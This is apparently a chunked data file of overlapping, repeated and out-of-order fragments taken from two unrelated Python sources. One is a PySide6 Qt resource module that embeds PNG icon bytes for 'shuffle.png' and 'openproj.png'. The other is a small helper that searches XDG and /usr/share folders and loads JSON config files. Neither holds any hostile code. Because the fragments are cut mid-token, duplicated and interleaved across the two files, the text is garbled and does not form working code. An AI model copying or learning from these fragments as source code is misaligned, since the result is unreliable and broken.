"\\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\",
"K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\",
"this file will be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\",
"# WARNING! All changes made in this file will be lost! from PySide6",
"\\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\",
"F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\",
"\\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\",
"\\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\",
"ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\",
"\\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\",
"\\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\",
"\\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\",
"\\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe",
",X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\",
"\\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\",
"code # Created by: The Resource Compiler for Qt version 6.2.2 # WARNING!",
"PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\",
"\\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\",
"\\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\",
"d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\",
"qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\",
"WARNING! All changes made in this file will be lost! from PySide6 import",
"PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\",
"\\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\",
"will be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\",
"PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\",
"\\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\",
"\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\",
"# Resource object code (Python 3) # Created by: object code # Created"
] |
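The module above is machine-generated by Qt's resource compiler and is not meant to be edited by hand; importing it registers the two embedded icons with Qt's resource system. A minimal usage sketch follows, assuming the generated module was saved as resources_rc.py (that file name, and the QPushButton around the icon, are illustrative assumptions, not taken from the row above):

import resources_rc  # noqa: F401  # importing runs qInitResources() at load time
from PySide6 import QtGui, QtWidgets

app = QtWidgets.QApplication([])

# once registered, the two embedded images resolve under the ":/icons/" prefix
shuffle_icon = QtGui.QIcon(":/icons/shuffle.png")
openproj_icon = QtGui.QIcon(":/icons/openproj.png")

button = QtWidgets.QPushButton("Shuffle")  # hypothetical widget, just to exercise the icon
button.setIcon(shuffle_icon)
button.show()
app.exec()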
[
"if file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files:",
"easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list",
"def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the loaded json",
"] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the loaded",
"the given folders for file_name search_folders defaults to default_search_folders if not specified return",
"''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name",
"finding file_name in search_folders return the loaded json data or None if file",
"] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults to",
"this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to",
"loaded json data or None if file not found ''' actual_files = find_paths(file_name,",
"of folders to search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME,",
"os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the",
"find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults to default_search_folders if",
"os.path.join(folder, file_name) for folder in search_folders ] return [ path for path in",
"= find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r') as",
"to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of",
"folders to search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name),",
"app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the",
"Return the list of folders to search for configuration files ''' return [",
"return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ]",
"] return [ path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None):",
"in search_folders ] return [ path for path in possible_files if os.path.exists(path) ]",
"not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None",
"search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' %",
"find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r') as reader:",
"''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder",
"after finding file_name in search_folders return the loaded json data or None if",
"% app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders",
"return the loaded json data or None if file not found ''' actual_files",
"return the first path to file_name found ''' search_folders = search_folders or default_search_folders(app_name)",
"app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r') as reader: return",
"path to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [",
"path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after",
"the list of folders to search for configuration files ''' return [ '%s/cdis/%s'",
